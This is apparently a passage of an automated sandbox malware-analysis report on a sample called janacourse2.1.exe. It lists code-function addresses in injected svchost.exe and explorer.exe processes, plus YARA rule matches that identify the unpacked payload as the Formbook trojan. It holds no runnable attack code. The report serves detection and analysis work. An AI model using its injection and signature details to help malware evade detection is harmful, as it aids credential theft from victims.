          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344AD001_2_0344AD00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DCD1F1_2_034DCD1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343ADE01_2_0343ADE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03458DBF1_2_03458DBF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440C001_2_03440C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430CF21_2_03430CF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0CB51_2_034E0CB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342D34C1_2_0342D34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F132D1_2_034F132D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0348739A1_2_0348739A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345B2C01_2_0345B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E12ED1_2_034E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345D2F01_2_0345D2F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034452A01_2_034452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347516C1_2_0347516C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342F1721_2_0342F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0350B16B1_2_0350B16B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344B1B01_2_0344B1B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EF0CC1_2_034EF0CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034470C01_2_034470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F70E91_2_034F70E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FF0E01_2_034FF0E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FF7B01_2_034FF7B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034856301_2_03485630
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F16CC1_2_034F16CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F75711_2_034F7571
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035095C31_2_035095C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DD5B01_2_034DD5B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034314601_2_03431460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FF43F1_2_034FF43F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FFB761_2_034FFB76
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B5BF01_2_034B5BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347DBF91_2_0347DBF9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345FB801_2_0345FB80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FFA491_2_034FFA49
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F7A461_2_034F7A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B3A6C1_2_034B3A6C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EDAC61_2_034EDAC6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DDAAC1_2_034DDAAC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03485AA01_2_03485AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E1AA31_2_034E1AA3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034499501_2_03449950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345B9501_2_0345B950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D59101_2_034D5910
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AD8001_2_034AD800
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034438E01_2_034438E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FFF091_2_034FFF09
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03403FD21_2_03403FD2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03403FD51_2_03403FD5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03441F921_2_03441F92
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FFFB11_2_034FFFB1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03449EB01_2_03449EB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03443D401_2_03443D40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F1D5A1_2_034F1D5A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F7D731_2_034F7D73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345FDC01_2_0345FDC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B9C321_2_034B9C32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FFCF21_2_034FFCF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA0361_2_032DA036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DB2321_2_032DB232
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D10821_2_032D1082
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE5CD1_2_032DE5CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D5B301_2_032D5B30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D5B321_2_032D5B32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D89121_2_032D8912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2D021_2_032D2D02
          Source: C:\Windows\explorer.exeCode function: 2_2_0E5B92322_2_0E5B9232
          Source: C:\Windows\explorer.exeCode function: 2_2_0E5B80362_2_0E5B8036
          Source: C:\Windows\explorer.exeCode function: 2_2_0E5AF0822_2_0E5AF082
          Source: C:\Windows\explorer.exeCode function: 2_2_0E5B69122_2_0E5B6912
          Source: C:\Windows\explorer.exeCode function: 2_2_0E5B0D022_2_0E5B0D02
          Source: C:\Windows\explorer.exeCode function: 2_2_0E5B3B322_2_0E5B3B32
          Source: C:\Windows\explorer.exeCode function: 2_2_0E5B3B302_2_0E5B3B30
          Source: C:\Windows\explorer.exeCode function: 2_2_0E5BC5CD2_2_0E5BC5CD
          Source: C:\Windows\explorer.exeCode function: 2_2_10CF00822_2_10CF0082
          Source: C:\Windows\explorer.exeCode function: 2_2_10CF90362_2_10CF9036
          Source: C:\Windows\explorer.exeCode function: 2_2_10CFD5CD2_2_10CFD5CD
          Source: C:\Windows\explorer.exeCode function: 2_2_10CF1D022_2_10CF1D02
          Source: C:\Windows\explorer.exeCode function: 2_2_10CF79122_2_10CF7912
          Source: C:\Windows\explorer.exeCode function: 2_2_10CFA2322_2_10CFA232
          Source: C:\Windows\explorer.exeCode function: 2_2_10CF4B322_2_10CF4B32
          Source: C:\Windows\explorer.exeCode function: 2_2_10CF4B302_2_10CF4B30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B9E4F63_2_04B9E4F6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B944203_2_04B94420
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BA24463_2_04BA2446
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BB05913_2_04BB0591
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AF05353_2_04AF0535
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B0C6E03_2_04B0C6E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AEC7C03_2_04AEC7C0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AF07703_2_04AF0770
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B147503_2_04B14750
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B820003_2_04B82000
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BB01AA3_2_04BB01AA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BA41A23_2_04BA41A2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BA81CC3_2_04BA81CC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B8A1183_2_04B8A118
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AE01003_2_04AE0100
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B781583_2_04B78158
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B702C03_2_04B702C0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B902743_2_04B90274
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BB03E63_2_04BB03E6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AFE3F03_2_04AFE3F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BAA3523_2_04BAA352
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B90CB53_2_04B90CB5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AE0CF23_2_04AE0CF2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AF0C003_2_04AF0C00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B08DBF3_2_04B08DBF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AEADE03_2_04AEADE0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B8CD1F3_2_04B8CD1F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AFAD003_2_04AFAD00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B02E903_2_04B02E90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BACE933_2_04BACE93
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BAEEDB3_2_04BAEEDB
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BAEE263_2_04BAEE26
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AF0E593_2_04AF0E59
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B6EFA03_2_04B6EFA0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AE2FC83_2_04AE2FC8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B10F303_2_04B10F30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B92F303_2_04B92F30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B32F283_2_04B32F28
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B64F403_2_04B64F40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AD68B83_2_04AD68B8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B1E8F03_2_04B1E8F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AF28403_2_04AF2840
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AFA8403_2_04AFA840
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AF29A03_2_04AF29A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BBA9A63_2_04BBA9A6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B069623_2_04B06962
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AEEA803_2_04AEEA80
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BA6BD73_2_04BA6BD7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BAAB403_2_04BAAB40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BAF43F3_2_04BAF43F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AE14603_2_04AE1460
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B8D5B03_2_04B8D5B0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BB95C33_2_04BB95C3
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BA75713_2_04BA7571
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BA16CC3_2_04BA16CC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B356303_2_04B35630
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BAF7B03_2_04BAF7B0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BA70E93_2_04BA70E9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BAF0E03_2_04BAF0E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AF70C03_2_04AF70C0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B9F0CC3_2_04B9F0CC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AFB1B03_2_04AFB1B0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BBB16B3_2_04BBB16B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B2516C3_2_04B2516C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04ADF1723_2_04ADF172
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AF52A03_2_04AF52A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B0D2F03_2_04B0D2F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B912ED3_2_04B912ED
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B0B2C03_2_04B0B2C0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B3739A3_2_04B3739A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BA132D3_2_04BA132D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04ADD34C3_2_04ADD34C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BAFCF23_2_04BAFCF2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B69C323_2_04B69C32
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B0FDC03_2_04B0FDC0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BA7D733_2_04BA7D73
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BA1D5A3_2_04BA1D5A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AF3D403_2_04AF3D40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AF9EB03_2_04AF9EB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BAFFB13_2_04BAFFB1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AF1F923_2_04AF1F92
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AB3FD23_2_04AB3FD2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AB3FD53_2_04AB3FD5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BAFF093_2_04BAFF09
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AF38E03_2_04AF38E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B5D8003_2_04B5D800
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B859103_2_04B85910
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B0B9503_2_04B0B950
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AF99503_2_04AF9950
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B35AA03_2_04B35AA0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B8DAAC3_2_04B8DAAC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B91AA33_2_04B91AA3
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B9DAC63_2_04B9DAC6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B63A6C3_2_04B63A6C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BAFA493_2_04BAFA49
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BA7A463_2_04BA7A46
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B0FB803_2_04B0FB80
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B65BF03_2_04B65BF0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B2DBF93_2_04B2DBF9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BAFB763_2_04BAFB76
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_029EE7A43_2_029EE7A4
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_029D9E5C3_2_029D9E5C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_029D9E603_2_029D9E60
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_029D2FB03_2_029D2FB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_029D2D903_2_029D2D90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_029D2D873_2_029D2D87
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_0499A0363_2_0499A036
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_0499E5CD3_2_0499E5CD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04992D023_2_04992D02
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_049910823_2_04991082
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_049989123_2_04998912
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_0499B2323_2_0499B232
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04995B303_2_04995B30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04995B323_2_04995B32
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: String function: 00FCF9F2 appears 31 times
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: String function: 00FD0A30 appears 46 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 04ADB970 appears 262 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 04B37E54 appears 107 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 04B6F290 appears 103 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 04B25130 appears 58 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 04B5EA12 appears 86 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034AEA12 appears 86 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0342B970 appears 262 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03475130 appears 58 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03487E54 appears 107 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034BF290 appears 103 times
          Source: janacourse2.1.exe, 00000000.00000003.1649753787.0000000003FBD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs janacourse2.1.exe
          Source: janacourse2.1.exe, 00000000.00000003.1650634228.0000000003E13000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs janacourse2.1.exe
          Source: janacourse2.1.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.janacourse2.1.exe.1df0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.janacourse2.1.exe.1df0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.janacourse2.1.exe.1df0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.janacourse2.1.exe.1df0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.janacourse2.1.exe.1df0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.janacourse2.1.exe.1df0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.2894349605.0000000004840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.2894349605.0000000004840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.2894349605.0000000004840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1707952623.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1707952623.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1707952623.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1653240375.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1653240375.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
